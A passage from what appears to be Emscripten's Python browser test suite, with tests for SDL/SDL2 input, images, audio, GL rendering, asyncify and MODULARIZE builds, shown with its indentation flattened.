for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
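  # Test Module.locateFile, supplied either from a --pre-js or from the HTML shell, for both wasm and mem-init builds.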
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
    # load an image file and get pixel data. Also provides -O2 coverage for --preload-file and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
    # Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
    # than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE=1', '-s', 'MINIMAL_RUNTIME=1'])
self.run_browser('test.html', None, '/report_result?0')
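  # Test -s MODULARIZE=1: the factory function should return a promise, avoid polluting the global scope, and accept Module options.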
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
          if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
          HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
let promise = HelloWorld();
          if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE=1', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
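  # Test that a failure to fetch the wasm binary rejects the promise returned by the MODULARIZE factory function.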
def test_modularize_network_error(self):
test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
  # test illustrating the regression in the modularize feature since commit c5af8f6
  # when compiling with the --preload-file option
@no_wasm_backend('cannot customize INITIAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
    # an amount of memory, different from the default, to be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
            // read INITIAL_MEMORY via bracket notation so the test also succeeds with closure compiler enabled
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
